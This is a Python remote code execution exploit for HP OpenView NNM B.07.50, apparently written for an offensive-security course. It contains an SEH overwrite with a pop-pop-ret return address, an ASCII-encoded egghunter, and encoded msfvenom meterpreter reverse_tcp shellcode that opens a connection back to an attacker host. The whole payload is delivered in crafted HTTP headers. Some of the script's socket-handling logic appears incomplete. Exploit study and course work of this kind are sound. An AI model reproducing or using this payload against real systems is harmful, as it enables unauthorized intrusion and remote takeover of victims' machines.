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Created March 29, 2017 23:55
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HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'
import struct
import socket
HOST = '192.168.XXX.YYY'
PORT = 7510
def exploit(conn):
# Return address in a Pop-Pop-Ret / SEH fashion to overwrite Exception handler:
# 0x6d213d2b : pop esi # pop ebp # ret
# | asciiprint,ascii {PAGE_EXECUTE_READ} [java.dll] ASLR: False, SafeSEH: False
return_address = 0x6d213d2b
ret = struct.pack('<I', return_address)
junk = 'A' * (3381 - 4)
# Stage 1: Jump over handler's address
# 71 08 JNO short $+8
# 70 06 JO short $+6
stage1 = '\x71\x08\x70\x06'
stage2 = 'G' * 32
# This is an windows 32-byte long egghunter
# encoded with my custom ASCII encoder
# Which can be located in this gist:
egghunter = r"%JMNU%521*TX-A777-i%"
egghunter += r"%%-r2II-\ZZZP\%JMNU%"
egghunter += r"521*-gNlN-zG1G-yQ1Q-"
egghunter += r"1111P-cj10-v777-uX4X"
egghunter += r"-xwxxP-NNNN-s1*z-J*r"
egghunter += r"x-ttttP-5S%w-0n4v-nn"
egghunter += r"nn-nnnnP-jj7j-vj%n-i"
egghunter += r"t3y-jjjjP-d%ud-n1rf-"
egghunter += r"7%tI-1111P-4Rfx-*5\v"
egghunter += r"-92\y-\\\\P-p222-v2v"
egghunter += r"v-O6wV-t%hkP"
stage2 += egghunter
stage2 += 'G' * 100
stage2 += ':7510'
exp = junk + stage1 + ret + stage2
egg = 'T00WT00W'
shellcode = ''
# Shellcode generated using MSFVENOM - leveraging BufferRegister option since our egghunter
# at the end takes a long jump to the value of EDI register, which is a base for the shellcode.
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=443 \
# BufferRegister=EDI -f raw -e x86/alpha_mixed -b '\x00\x0a\x0d'
# Payload size: 720 bytes
shellcode += "BBABXP8ABuJI9lixk25PGps0apmY9ufQiPatNkf0"
shellcode += "FPNkF2flNk1BEDlKT2gXFomg2ja6019oLlWLcQcL"
shellcode += "DBtlGPJaxOvmuQKwzBYbQBSglKRr4PNkaZWLLKPL"
shellcode += "4QSHkSSxuQkaf1Nk2yWPC1IClKg9FxjCVZbilK4t"
shellcode += "LKEQJv5aYoLlzazotMVaYW5hKP1el6uSaml8Uk3M"
shellcode += "5t1e9tbxNkaH5tWqN30fNkVlrkLKaHELEQKcnkWt"
shellcode += "LK7qN0MYqTvDetCkaKcQByaJ619okP1OCo2zlK22"
shellcode += "XknmQMBH7CGBc0C0axbWPsUbCo2tE8pLPwdf4GYo"
shellcode += "IEh8j05QS0gp4iKtrtV0E8gYk00kuPyoZuSZc50h"
shellcode += "YP98rDvWbHs25PC1MkniYvf0rp2pv0g0V0cpbpQx"
shellcode += "XjTOyOM0yo9Ej7SZR0Bv67SXZ9mu0tPakOIElEIP"
shellcode += "0tuZIobns8RU8lkXqqS0S0wprJC0PjeTv62wu8DB"
shellcode += "n9hHQOiohUNcJX7pcNgFNkefSZaPsXwpVpwpeP2v"
shellcode += "sZs0e8chLd2sM5KOKeNsF30jEPBvpSQG1xwr8YhH"
shellcode += "qOIozuMSIhs03M4b1HRHWp3pgp30Qzs0pPBH4K4o"
shellcode += "foVP9ozusgQxQe2N2mQqKOhUqNQN9ofletHibQYo"
shellcode += "Yo9os1zcgYZf0uKwhCMkL0nUmr66PjS063IoXUAA"
shellcode += "\xcc" * 500
buf = 'GET /topology/homeBaseView HTTP/1.1\r\n'
buf += 'Host: ' + exp + '\r\n'
buf += 'Content-Type: application/x-www-form-urlencoded\r\n'
buf += 'User-Agent: ' + shellcode + '\r\n'
buf += 'Content-Length: 1048580\r\n\r\n'
buf += egg + shellcode
print '[+] Sending HTTP packet of %d length...' % len(buf)
print '\tHost header len: %d' % len(exp)
print '\tEgghunter len: %d' % len(stage2)
print '\tShellcode len: %d' % len(shellcode)
print '[?] Wait about 7-15 seconds until exploit kicks in.'
def main():
print '[*] HP OpenView NNM B.07.50 Remote Code Execution exploit'
print '[*] by Mariusz B. / mgeeky, 17'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print '[.] Connecting with %s:%d...' % (HOST, PORT)
conn = sock.connect((HOST, PORT))
print '[+] Connected.'
print '[!] Could not connect.'
return None
if __name__ == '__main__':
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